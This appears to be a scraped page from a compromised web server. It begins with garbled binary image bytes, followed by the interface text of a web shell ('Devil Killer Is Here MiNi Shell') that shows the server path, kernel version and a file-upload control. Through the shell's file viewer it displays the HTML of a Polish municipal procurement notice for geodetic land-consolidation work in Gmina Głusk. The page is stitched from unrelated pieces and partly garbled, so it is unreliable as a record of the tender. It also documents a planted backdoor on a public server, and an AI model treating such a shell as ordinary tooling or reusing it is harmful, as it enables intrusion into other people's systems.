JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20211129/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20211129/0028999901-N-2021.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> „Wykonanie prac geodezyjnych w procedurze scalenia i podziału nieruchomości położonych na terenie wsi Wólka Abramowicka w Gminie Głusk”(II) </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">GMINA GŁUSK</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 431019980</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Rynek 1</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Dominów</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">20-388</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">lubelskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL814 - Lubelski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">81-75-18-760</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">81-75-18-650</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">sekretariat@glusk.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">glusk.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> „Wykonanie prac geodezyjnych w procedurze scalenia i podziału nieruchomości położonych na terenie wsi Wólka Abramowicka w Gminie Głusk”(II) </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-a47e3fde-4e9a-11ec-8c2d-66c2f1230e9c</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00289999</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-11-29</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00003796/08/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.7 Wykonanie prac geodezyjnych w procedurze scalenia i podziału nieruchomości położonych na terenie wsi Wólka Abramowicka w Gminie Głusk</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 2 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> www.miniportal.uzp.gov.pl <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">www.miniportal.uzp.gov.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Wymagania techniczne i organizacyjne wysyłania i odbierania korespondencji elektronicznej<br/>przekazywanej przy ich użyciu, opisane zostały w Regulaminie korzystania z miniPortalu dostępnym<br/>pod adresem https://miniportal.uzp.gov.pl/WarunkiUslugi.aspx oraz Regulaminie ePUAP.<br/>W postępowaniu o udzielenie zamówienia korespondencja elektroniczna (inna niż oferta Wykonawcy i<br/>załączniki do oferty) odbywa się elektronicznie za pośrednictwem dedykowanego formularza<br/>dostępnego na ePUAP oraz udostępnionego przez miniPortal (Formularz do komunikacji).<br/>Korespondencja przesłana za pomocą tego formularza nie może być szyfrowana. We wszelkiej<br/>korespondencji związanej z niniejszym postępowaniem Zamawiający i Wykonawcy posługują się<br/>numerem ogłoszenia (BZP).<br/>Zamawiający może również komunikować się z Wykonawcami za pomocą poczty elektronicznej, email:<br/>sekretariat@glusk.pl<br/>Dokumenty elektroniczne, oświadczenia lub elektroniczne kopie dokumentów lub oświadczeń składane<br/>są przez Wykonawcę za pośrednictwem Formularza do komunikacji jako załączniki. Zamawiający<br/>dopuszcza również możliwość składania dokumentów elektronicznych, oświadczeń lub elektronicznych<br/>kopii dokumentów lub oświadczeń za pomocą poczty elektronicznej, na adres email sekretariat@glusk.pl</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z Rozdziałem XX SWZ:<br/>Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27<br/>kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i<br/>w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne<br/>rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z 04.05.2016, str. 1), dalej „Rozporządzenie”,<br/>informuję, że:<br/>1. Administratorem Pani/Pana danych osobowych jest Gmina Głusk, ul. Rynek 1, 20-388 Dominów, e mail: sekretariat@gusk.pl, nr tel.: 817518760, fax: 817518650.<br/>2. W sprawach z zakresu ochrony danych osobowych mogą Państwo kontaktować się<br/>z Inspektorem Ochrony Danych pod adresem e-mail: inspektor@cbi24.pl<br/>3. Dane osobowe będą przetwarzane w celu związanym z postępowaniem o udzielenie zamówienia<br/>publicznego.<br/>4. Dane osobowe będą przetwarzane przez okres zgodnie z art. 78 ust. 1 i 4 ustawy z dnia 11 września<br/>2019 r.– Prawo zamówień publicznych (Dz. U. z 2019 r. poz. 2019), zwanej dalej PZP, przez okres 4<br/>lat od dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy<br/>przekracza 4 lata, okres przechowywania obejmuje cały czas obowiązywania umowy.<br/>5. Podstawą prawną przetwarzania danych jest art. 6 ust. 1 lit. c) ww. Rozporządzenia<br/>w związku z przepisami PZP.<br/>6. Odbiorcami Pani/Pana danych będą osoby lub podmioty, którym udostępniona zostanie<br/>dokumentacja postępowania w oparciu o art. 18 oraz art. 74 ust. 4 PZP.<br/>7. Obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest<br/>wymogiem ustawowym określonym w przepisach PZP, związanym<br/>z udziałem w postępowaniu o udzielenie zamówienia publicznego; konsekwencje niepodania<br/>określonych danych wynikają z PZP.<br/>8. Osoba, której dane dotyczą ma prawo do:<br/>- dostępu do treści swoich danych oraz możliwości ich poprawiania, sprostowania, ograniczenia<br/>przetwarzania,<br/>- w przypadku gdy przetwarzanie danych odbywa się z naruszeniem przepisów Rozporządzenia służy<br/>prawo wniesienia skargi do organu nadzorczego tj. Prezesa Urzędu Ochrony Danych Osobowych, ul.<br/>Stawki 2, 00-193 Warszawa,<br/>9. Osobie, której dane dotyczą nie przysługuje:<br/>- w związku z art. 17 ust. 3 lit. b, d lub e Rozporządzenia prawo do usunięcia danych osobowych;<br/>- prawo do przenoszenia danych osobowych, o którym mowa w art. 20 Rozporządzenia;<br/>- na podstawie art. 21 Rozporządzenia prawo sprzeciwu, wobec przetwarzania danych osobowych.</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Zgodnie z Rozdziałem XX SWZ.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZP.271.33.2021</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1. Przedmiotem zamówienia jest usługa pn. Wykonanie prac geodezyjnych w procedurze<br/>scalenia i podziału nieruchomości położonych na terenie wsi Wólka Abramowicka w Gminie<br/>Głusk obejmująca: prace geodezyjne w procedurze scalenia i podziału nieruchomości w trybie<br/>określonym w przepisach od art. 101 do art. 108 ustawy o gospodarce nieruchomościami (Dz. U.<br/>z 2021 r. poz. 1899 z późn. zm.), Rozporządzenia Rady Ministrów z dnia 4 maja 2005 r. (Dz. U.<br/>z 2005 r. Nr 86 poz. 736) w sprawie scalania i podziału nieruchomości, z uwzględnieniem<br/>Uchwały Nr XXXIV/294/21 Rady Gminy Głusk z dnia 15 czerwca 2021 r. w sprawie<br/>przystąpienia do scalenia i podziału nieruchomości położonych w Wólce Abramowickiej oraz<br/>Uchwały Nr XLIX/304/10 Rady Gminy Głusk z dnia 15 lipca 2010 r. w sprawie zmiany<br/>miejscowego planu zagospodarowania przestrzennego Gminy Głusk – w miejscowości Wólka<br/>Abramowicka dla obszarów oznaczonych symbolami: CIWA11MN, CIWA12E, CIWA13MN,<br/>CIWA14MN, CIWA15MN, CIWA16MN/U, CIWA17MN.<br/>2. W w/w procedurze nie stosuje się przepisów ustawy z dnia 26 marca 1982 r. o scaleniu i<br/>wymianie gruntów (Dz. U. z 2021 r. poz. 1912).<br/>3. Powierzchnia scalenia i podziału nieruchomości w Wólce Abramowickiej wynosi około 12,30<br/>ha.<br/>4. Przedmiotem zamówienia jest świadczenie przez Wykonawcę na rzecz Zamawiającego -<br/>Gminy Głusk usług obejmujących prace geodezyjne w procedurze scalenia i podziału<br/>nieruchomości oraz przeprowadzenie procedury zgodnie z przepisami określonymi w w/w<br/>rozporządzeniu Rady Ministrów z dnia 4 maja 2005 r. w sprawie scalania i podziału<br/>nieruchomości oraz w ustawie z dnia 21 sierpnia 1997 r. o gospodarce nieruchomościami, w<br/>następujących etapach tj.:<br/>1) Etap I – opracowanie dokumentacji technicznej i prawnej dla dotychczasowego stanu<br/>posiadania:<br/>a) sporządzenie wniosków do Sądu Rejonowego o ujawnienie w księgach wieczystych uchwały<br/>o przystąpieniu do scalenia i podziału nieruchomości, a w przypadku gdy dla nieruchomości nie<br/>ma założonej księgi wieczystej, złożenie odpisu uchwały do istniejącego zbioru dokumentów;<br/>b) badanie zgodności danych zawartych w ewidencji gruntów i budynków z danymi zawartymi w<br/>księgach wieczystych lub zbiorach dokumentów;<br/>c) geodezyjne opracowanie, okazanie uczestnikom scalenia i przyjęcie zewnętrznych granic<br/>gruntów objętych scaleniem i podziałem;<br/>d) obliczenie powierzchni i sporządzenie rejestru nieruchomości według stanu<br/>dotychczasowego;<br/>e) sporządzenie, w razie potrzeby, dokumentacji w celu aktualizacji wpisów w księgach<br/>wieczystych i katastrze nieruchomości;<br/>f) sporządzenie wykazu ograniczonych praw rzeczowych ciążących na nieruchomościach;<br/>2) Etap II – opracowanie dokumentacji technicznej i prawnej dla projektu scalenia i podziału:<br/>a) wykonanie geodezyjnego projektu scalenia i podziału nieruchomości;<br/>b) sporządzenie rejestru nieruchomości z wykazaniem stanu dotychczasowego oraz stanu<br/>nowego po scaleniu i podziale według zasad określonych w art. 104 ust. 2 pkt 4 ustawy o<br/>gospodarce nieruchomościami;<br/>c) przygotowanie projektu uchwały w przedmiocie scalenia i podziału nieruchomości do<br/>wyłożenia do wglądu;<br/>d) uzyskanie, przed odbiorem przez Zamawiającego, pozytywnej weryfikacji dokumentacji, o<br/>której mowa powyżej, przez Powiatowy Ośrodek Dokumentacji Geodezyjnej i Kartograficznej w<br/>Lublinie;<br/>e) przygotowanie projektu uchwały scalenia i podziału nieruchomości;<br/>3) Etap III – po podjęciu uchwały w przedmiocie scalenia i podziału nieruchomości przez Radę<br/>Gminy Głusk:<br/>a) sporządzenie wniosków o dokonanie wpisów w księgach wieczystych lub wniosków o założenie ksiąg wieczystych dla nieruchomości objętych scaleniem i podziałem;<br/>b) sporządzenie operatu szacunkowego do określenia wartości dopłat i zwrotów należnych<br/>właścicielom, wynikających z różnicy powierzchni nieruchomości przyznanych uczestnikom<br/>postępowania, w zamian za nieruchomości będące ich własnością lub pozostające w<br/>użytkowaniu wieczystym przed scaleniem i podziałem, jeżeli nie ma możliwości przydzielenia<br/>nieruchomości o powierzchni w pełni równoważnej,<br/>c) wyznaczenie i wskazanie uczestnikom postępowania granic nowo wydzielonych działek<br/>gruntu oraz utrwalenie punktów granicznych, zgodnie z art. 17 rozporządzenia Ministra Spraw<br/>Wewnętrznych oraz Rolnictwa i Gospodarki Żywnościowej z dnia 14 kwietnia 1999 r. w sprawie<br/>rozgraniczenia nieruchomości (Dz. U z 1999 r. Nr 45 poz. 453 ze zm.).<br/>5. Dodatkowo do obowiązków Wykonawcy należeć będzie:<br/>1) rozpoznanie stopnia dostępności materiałów koniecznych do realizacji zamówienia w<br/>urzędach i instytucjach dysponujących tymi materiałami;<br/>2) uczestniczenie na każdym etapie postępowania w zebraniach rady uczestników scalenia;<br/>3) przygotowanie projektów pism przeznaczonych do podpisu przez Zamawiającego<br/>niezbędnych dla prawidłowego przeprowadzenia procedury oraz ogłoszenia do publikacji w<br/>prasie, a także listę adresatów (pisma przeznaczone do wysyłki lub publikacji Zamawiający<br/>wyśle lub opublikuje na własny koszt);<br/>4) zwrócenie Zamawiającemu wszystkich wypożyczonych dokumentów w terminie uzgodnionym<br/>w protokole przekazania, lecz nie później niż do terminu wykonania zamówienia (niezwrócenie<br/>dokumentów spowoduje wstrzymanie wypłaty wynagrodzenia). </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">70000000-1 - Usługi w zakresie nieruchomości</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">71250000-5 - Usługi architektoniczne, inżynieryjne i pomiarowe</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">12 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.14.) Przedmiot, wielkość lub zakres oraz warunki zamówień na podobne usługi lub roboty budowlane: <span class="normal">Zamawiający przewiduje możliwość udzielenia zamówień, o których mowa w art. 214 ust.<br/>1 pkt 7) ustawy Pzp, o wartości nie większej niż 50% wartości szacunkowej zamówienia<br/>podstawowego, w okresie 3 lat od dnia udzielenia zamówienia podstawowego, dotychczasowemu<br/>wykonawcy usług, polegającego na powtórzeniu podobnych usług polegających na wykonaniu prac<br/>geodezyjnych w procedurze scalenia i podziału nieruchomości. Udzielenie zamówień podobnych<br/>będzie uzależnione od zaistnienia takiej konieczności i posiadania przez Zamawiającego środków<br/>finansowych. Zamówienie zostało przewidziane w ogłoszeniu o zamówieniu dla zamówienia<br/>podstawowego i będzie zgodne z jego przedmiotem. Całkowita wartość tego zamówienia została<br/>uwzględniona przy obliczaniu wartości zamówienia podstawowego. Warunki udzielenia zamówienia:<br/>a) zamówienie zostanie udzielone po przeprowadzeniu procedury przewidzianej dla zamówienia z<br/>wolnej ręki, w szczególności poprzez zaproszenie wykonawcy do negocjacji oraz negocjacje z<br/>wykonawcą;<br/>b) dotychczasowy wykonawca realizował usługi objęte zamówieniem podstawowym<br/>w terminie i z najwyższą starannością,<br/>c) wykonawca będzie musiał wykazać spełnienie warunków udziału w postępowaniu, które zostaną<br/>określone przez Zamawiającego oraz przedłożyć stosowne dokumenty i oświadczenia na<br/>potwierdzenie spełnienia tych warunków, w zakresie określonym przez Zamawiającego,<br/>d) wykonawca będzie musiał wykazać brak podstaw do wykluczenia oraz przedłożyć stosowne dokumenty i oświadczenia na potwierdzenie braku podstaw do wykluczenia,<br/>e) wykonawca będzie zobowiązany zapewnić nie gorszy standard wykonywania nowego zamówienia<br/>niż podstawowego oraz zaakceptować istotne postanowienia dotychczasowej umowy o zamówienie<br/>podstawowe,<br/>f) przedmiotem negocjacji z wykonawcą będą w szczególności: oferowana przez wykonawcę cena<br/>oraz szczegółowe warunki realizacji zamówienia (w tym termin wykonania zamówienia oraz okresu<br/>gwarancji jakości) z zachowaniem wymogów określonych przez Zamawiającego w opisie przedmiotu<br/>zamówienia i warunkach przyszłej umowy o zamówienie publiczne.</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">za pomocą kryterium oceny ofert</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Doświadczenie osoby wskazanej do realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1. O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy nie podlegają wykluczeniu<br/>oraz spełniają warunki udziału w postępowaniu, dotyczące:<br/>1) uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika<br/>to z odrębnych przepisów:<br/>Zamawiający nie określa szczegółowych warunków w tym zakresie.<br/>2) sytuacji ekonomicznej lub finansowej:<br/>Zamawiający nie określa szczegółowych warunków w tym zakresie.<br/>3) zdolności technicznej lub zawodowej:<br/>Warunek ten zostanie spełniony, jeżeli Wykonawca wykaże, że:<br/>a) posiada doświadczenie zawodowe polegające na wykonaniu, a w przypadku świadczeń<br/>powtarzających się lub ciągłych również wykonywanych w okresie ostatnich 3 lat, a jeżeli okres<br/>prowadzenia działalności jest krótszy - w tym okresie, co najmniej jedną (1) usługę polegającą<br/>na wykonaniu scalenia i podziału nieruchomości,<br/>wraz z załączeniem dowodów określających, czy te usługi zostały wykonane lub są wykonywane<br/>należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty<br/>sporządzone przez podmiot, na rzecz którego usługi zostały wykonane, a w przypadku<br/>świadczeń powtarzających się lub ciągłych są wykonywane, a jeżeli wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów - oświadczenie wykonawcy; w<br/>przypadku świadczeń powtarzających się lub ciągłych nadal wykonywanych referencje bądź<br/>inne dokumenty potwierdzające ich należyte wykonywanie powinny być wystawione w okresie<br/>ostatnich 3 miesięcy;<br/>b) dysponuje co najmniej jedną osobą zdolną do wykonania przedmiotu zamówienia<br/>posiadającą łącznie uprawnienia zawodowe w zakresie uprawnień geodezyjnych, o których<br/>mowa w art. 43 pkt 1) - geodezyjne pomiary sytuacyjno-wysokościowe, realizacyjne i<br/>inwentaryzacyjne oraz art. 43 pkt 2) - rozgraniczanie i podziały nieruchomości (gruntów) oraz<br/>sporządzanie dokumentacji do celów prawnych – ustawy z dnia 17 maja 1989 r. Prawo<br/>geodezyjne i kartograficzne (Dz. U z 2020 r. poz. 2052 z późn. zm.).<br/>Doświadczenie osoby, o której mowa w w/w pkt b) stanowi II kryterium oceny ofert.<br/>2. Zamawiający wyklucza z postępowania:<br/>1) wykonawców, którzy nie wykazali spełnienia warunków udziału w postępowaniu,<br/>o których mowa w Rozdz. VI ust. 1 SWZ;<br/>2) wykonawców, którzy nie wykazali, że nie zachodzą wobec nich przesłanki określone w art.<br/>108 ust. 1 ustawy PZP; <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Zamawiający nie żąda złożenia podmiotowych środków dowodowych na brak podstaw do wykluczenia.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">2. Podmiotowe środki dowodowe dotyczące potwierdzenia spełniania<br/>warunków udziału w postępowaniu, składane na wezwanie Zamawiającego przez wykonawcę, którego<br/>oferta została najwyżej oceniona (w terminie wyznaczonym przez Zamawiającego, nie krótszym niż 5<br/>dni):<br/>1) wykazu usług wykonanych, a 